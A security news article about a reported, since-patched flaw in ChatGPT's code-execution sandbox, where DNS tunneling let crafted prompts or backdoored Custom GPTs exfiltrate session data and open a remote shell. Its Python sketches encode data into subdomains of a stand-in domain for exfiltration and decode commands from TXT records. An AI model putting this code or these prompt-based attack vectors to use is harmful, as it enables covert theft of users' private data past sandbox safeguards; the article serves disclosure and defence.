
How the Vulnerability Worked
The flaw resided in ChatGPT’s Python-based Data Analysis feature, which executes user code inside a sandboxed Linux runtime environment.
While OpenAI heavily restricts standard outbound internet traffic, including HTTP requests and arbitrary TCP connections, the containerized runtime still permits Domain Name System (DNS) resolution to function normally.
Attackers exploited this gap through a technique called DNS tunneling, where sensitive data fragments are encoded and appended as subdomains to attacker-controlled domains.
Because DNS queries are treated as routine infrastructure traffic rather than data transfers, the system never triggered outbound data warnings for users.
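The exfiltration step can be sketched in a few lines of Python. The domain, chunk size, and base32 framing below are illustrative assumptions — Check Point has not published the campaign's exact encoding — but base32-encoded subdomain labels are the standard DNS-tunneling construction, since base32 stays within DNS's case-insensitive label alphabet:

```python
import base64

# Hypothetical attacker-controlled domain; the real campaign's
# infrastructure has not been disclosed.
ATTACKER_DOMAIN = "exfil.example.com"

def encode_exfil_queries(data: bytes, domain: str = ATTACKER_DOMAIN,
                         chunk_size: int = 32) -> list[str]:
    """Split data into chunks and encode each as a DNS-safe subdomain label.

    32-byte chunks base32-encode to 56 characters, safely under the
    63-character limit on a single DNS label.
    """
    queries = []
    for i in range(0, len(data), chunk_size):
        label = base64.b32encode(data[i:i + chunk_size]).decode().rstrip("=").lower()
        queries.append(f"{label}.{domain}")
    return queries

# Inside the sandbox, merely *resolving* each name leaks the payload to the
# attacker's authoritative nameserver, even though no connection ever
# succeeds and no HTTP request is made:
#
#   import socket
#   for q in encode_exfil_queries(b"secret session data"):
#       try:
#           socket.getaddrinfo(q, None)
#       except socket.gaierror:
#           pass  # failure is irrelevant; the query has already left
```

Because the attacker controls the authoritative nameserver for the domain, every query — and therefore every encoded fragment — lands in their server logs regardless of what answer (if any) comes back.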
Threat actors could exploit this vulnerability through two distinct vectors. In the first method, a malicious prompt was distributed online, disguised as a “jailbreak” or a productivity trick, and once pasted into a chat session, it immediately weaponized the conversation.
In the second method, attackers embedded malicious logic directly into a backdoored Custom GPT.
Any user who shared data with that custom assistant would be instantly compromised, without requiring any additional prompt injection.
The severity extended well beyond passive data exfiltration. Because the DNS channel was bidirectional, attackers could encode command fragments within DNS responses sent back to the container.
This effectively established a remote shell inside ChatGPT’s Linux container, enabling threat actors to execute arbitrary commands entirely outside the model’s standard safety mechanisms, and to access any medical records, financial data, or files processed during the session.
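The return channel works the same way in reverse. A minimal sketch of the container-side logic, assuming commands arrive base64-encoded in DNS TXT answers (the attackers' exact framing has not been disclosed, and the control name here is hypothetical):

```python
import base64

def decode_command(txt_payload: str) -> str:
    """Decode one attacker command carried back in a DNS TXT answer.

    Base64 framing is an assumption for illustration; TXT records are a
    common tunneling choice because they carry free-form text.
    """
    return base64.b64decode(txt_payload).decode()

def poll_for_commands(resolve_txt, control_name: str = "c2.example.com") -> list[str]:
    """Fetch pending commands via an injected TXT resolver.

    resolve_txt would wrap a real lookup in the container (for example
    dnspython's dns.resolver.resolve(name, "TXT")); injecting it keeps
    this sketch network-free. A real implant would hand each decoded
    command to a shell and exfiltrate the output back out over the same
    encoded-subdomain channel shown above.
    """
    return [decode_command(payload) for payload in resolve_txt(control_name)]
```

The key point is that both directions ride on lookups the sandbox considers routine: queries carry data out, answers carry instructions in.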
| Detail | Information |
|---|---|
| Target Platform | ChatGPT Code Execution & Data Analysis Linux Runtime |
| Attack Vector | Malicious prompts or backdoored Custom GPTs |
| Exploit Technique | DNS Tunneling via encoded subdomain labels |
| Impact | Silent data exfiltration and remote shell access |
| Patch Date | February 20, 2026 |
OpenAI successfully patched the vulnerability on February 20, 2026, following responsible disclosure by Check Point Research.
This incident signals a critical shift in AI security: as large language models evolve into full code execution environments capable of processing sensitive personal, medical, and financial data, securing all communication layers, including foundational infrastructure protocols like DNS, becomes non-negotiable.
Platform providers must ensure that no infrastructure-level channel can be weaponized to bypass application-layer data protections.
The post ChatGPT Vulnerability Allows Silent Exfiltration of User Prompts and Sensitive Data appeared first on Cyber Security News.
